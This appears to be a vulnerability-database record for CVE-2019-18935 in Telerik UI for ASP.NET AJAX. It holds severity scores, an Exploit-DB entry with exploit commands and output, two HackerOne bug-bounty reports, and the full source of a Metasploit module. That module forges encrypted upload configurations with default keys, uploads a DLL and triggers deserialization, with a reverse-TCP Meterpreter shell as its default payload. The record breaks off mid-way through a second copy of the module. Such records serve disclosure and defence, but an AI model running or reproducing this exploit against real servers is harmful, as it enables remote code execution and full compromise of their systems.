"2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Contains a .NET deserialization vulnerability in the RadAsyncUpload function that can result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Progress Telerik UI for ASP.NET deserialization bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-18935", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-08T10:20:25", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-18935", "CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "sourceHref": "https://www.exploit-db.com/download/47793", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bounty": 0.0, "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. 
As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-02T08:13:07", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote Code Execution via CVE-2019-18935", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-08-13T18:11:22", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bounty": 0.0, "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is 
supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-03T14:48:45", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-05-07T16:54:15", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-20T20:37:38", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ 
\n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). 
\n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 
'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? 
\nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} 
\nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') 
\nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:42:04", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. 
It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/telerik_rau_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n 
DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
